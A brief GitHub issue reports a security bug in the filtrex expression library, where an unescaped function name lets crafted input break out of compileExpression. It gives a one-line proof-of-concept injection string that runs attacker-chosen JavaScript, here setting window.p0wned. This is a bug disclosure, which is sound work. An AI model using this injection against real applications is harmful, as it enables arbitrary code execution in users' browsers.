joewalnes/filtrex

Security bug – unescaped function name

cshaa opened this issue · 0 comments

cshaa commented

This will p0wn your browser.

compileExpression("'undefined:(window.p0wned=true)));((true?(x=>x)'()")()